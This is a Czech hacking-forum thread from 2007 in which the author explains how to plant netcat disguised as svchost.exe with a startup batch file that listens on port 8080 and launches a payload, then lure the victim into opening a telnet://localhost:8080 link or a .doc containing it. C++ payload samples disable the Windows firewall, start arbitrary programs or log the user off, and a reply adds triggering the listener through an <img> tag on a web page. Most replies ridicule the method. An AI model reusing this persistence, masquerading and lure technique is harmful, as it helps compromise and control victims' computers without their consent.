rozšířené možnosti nc

HackForum

rozšířené možnosti nc#
Před nějakou dobou jsem tady na hp uvedl článek (jmenoval se Exploit), jak pomocí telnetu spustit v počítači oběti libovolný program. Můj postup měl spoustu omezení: např. musel bych mít povolené ukládání souborů do složky "C:/windows/system32", musel bych mít práva roota apod...
Nicméně nevzdal jsem se myšlenky, že telnet je program, který můžeme na počítači oběti spustit aniž si toho všimne a není moc způsobů jak tomu může oběť zabránit.
Celou věc jsem pojal trochu komplexněji a položil si otázku:
"Jak spustit kdykoli oběti v počítači jakýkoli program nebo příkaz?"
Takže tady je návod:
Napíšeme si program (instalačku), která zkopíruje (někam do počítače):
1.Muj_crack.exe
2.netcat (přejmenovaný na svchost.exe)
3.do složky po spuštění soubor ahoj.bat---->přičemž tento soubor bude obsahovat:



adresa/svchost.exe -L -p8080 -d -e "adresa/muj_crack.exe"



Po zapnutí počítače se oběti hned spustí soubor ahoj.bat, který spustí nc (přejmenovaný na svchost.exe) v režimu naslouchání na portu 8080 a pokud se na tento port připojíte, tak vám předá (ee tentokrát ne příkazový řádek) ale program Muj_crack.exe

Vtipný je, že to nebude takhle fungovat:))
A proč? Tak především proto, že v dnešní době, každý používá Firewall nebo jiný paranoidní program, který vám nedovolí se na zvolený port telnetnout. To nám ale nevadí.
Pokud se spustí soubor ahoj.bat (až obět zapne nebo resetuje počítač) a nastane vše co jsem posal víše, tak oběti na počítači nejspíše zařve firewall a vyhodí něco ve smyslu, že "Funkce tohoto programu budou omezeny..."
(někdy to ani nenapíše), ale každopádně blokuje vzdálené připojení pomocí telnetu na tento počítač.
Vtip je v tom, že my se na tento počítač ani telnetnout nemusíme. Stračí poslat oběti takovýto link:


telnet://localhost:8080

Automaticky se jí sputí telnet a dojde k navázání spojení na portu 8080.
Nejhezčí na tom je, že se nikdo na počítač nepřipojuje z venku, takže to firewall neblokuje.
Protože ale máme na tomhle portu v řežimu naslouchání nc, spustí náš program a ten něco vykoná (to k čemu ho naprogramujeme).
Všechny programy mi takhle spustit nešly, ale zaručeně to funguje, pokud program Muj_crack.exe (psany v dev C++) bude obsahovat tohle:
-------------------------------
#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
system("cmd.exe|start jakykoli_program.exe");
return EXIT_SUCCESS;
}

-------------------------------
nebo
-------------------------------

#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
system("cmd.exe|netsh firewall set opmode disable");
return EXIT_SUCCESS;
}


-------------------------------
nebo
-------------------------------

#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
system("cmd.exe|logoff");
return EXIT_SUCCESS;
}

-------------------------------


dá se stím vyhrát:)))))))


jo a kdyby někomu vadilo, že spouštět telnet pomocí linku jde je nom z MSIE a FF to blokuje, tak můžete někomu poslat obyčejný *.doc, kde nastavíte telnet://localhost:8080 jako hypertextový odkaz:)))



htrans

(odpovědět)
htrans | 158.194.29.*9.6.2007 13:49
re: rozšířené možnosti nc#
htranz: tenhle článek mě posadil naprdel. :'(
1. Nevis, co je telnet (program).
2. K cemu ti to je?
3. Kdyz uz neco muzu nekam nahrat, muzu to vetsinou rovnou spustit.
4. Ja bych radeji spoustel reverzní připojení shellu
5. Pri kazdem restartu i manipulaci s pocitacem obeti z tvoji strany tam budou vyskakovat dosovy okna.

Jedina zajimava vec je, ze takhle muzes u napadeny obeti pustit nejaky soubor presne vy chvili, kdy najede na tvuj web (<img src="http://localhost:8080">).
(odpovědět)
Harvie. | 194.228.61.*9.6.2007 15:52
re: rozšířené možnosti nc#
Harvie: no mozna mas ve vetsine pravdu, ale nemela by se cenit aspon snaha? je dobry, ze se aspon snazi, a to by se melo imho cenit...
(odpovědět)
Shai | E-mail | Website | ICQ 341-300-1739.6.2007 22:57
re: rozšířené možnosti nc#
vtip je tvom, ze to je dobry vtip :DD ale vpoho
(odpovědět)
snop | E-mail9.6.2007 23:11
re: rozšířené možnosti nc#
Avtor je zrejme vtipalek a rad rozdava radost a smich kolem sebe. To je urcite chvalihodne. Zvlaste kdyz se podivam na jeho C++ kody. Znasilneni jazyka by se melo trestat stejne jako znasilneni a pohlavni zneuzivani.
(odpovědět)
XYZ | 62.75.163.*10.6.2007 11:17
re: rozšířené možnosti nc#
No, kdyz ho par let nechas, tak treba misto

//antifw.c:
#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
system("cmd.exe|netsh firewall set opmode disable");
return EXIT_SUCCESS;
}

jednou napise ---------------------------

rem antifw.bat:
cmd.exe & netsh firewall set opmode disable

;D



----------
Harvie's blog: [link] g33k-shop: [link] fs: [link]
Registered GNU/LINUX user #468114 [link]

(odpovědět)
Harvie | E-mail | Website | ICQ 28378297811.6.2007 10:31
re: rozšířené možnosti nc#
XYZ jj tak to by se mělo trestat a ještě většim trestem :))
(odpovědět)
petainho | Website10.6.2007 11:28
re: rozšířené možnosti nc#
cistokrvny debilko htrans.
(odpovědět)
j0e | 84.47.21.*10.6.2007 11:33
re: rozšířené možnosti nc#
htrans, sice te kazdy kritizuje, ale to by te melo popohnat nekam dal...
(odpovědět)
Shai | E-mail | Website | ICQ 341-300-17311.6.2007 0:12
re: rozšířené možnosti nc#
většinu lidí to sice pobaví, ale každopádně lepší než dotaz typu "jak nabourám banku do tejdne.." každej jsme nějak začínal a ikdyž já bych tohle nezveřejňoval, je to lepší než nic. Nenech se odradit a uč se dál.
(odpovědět)
mon | E-mail13.6.2007 21:18

Zpět
 
 
 

 
BBCode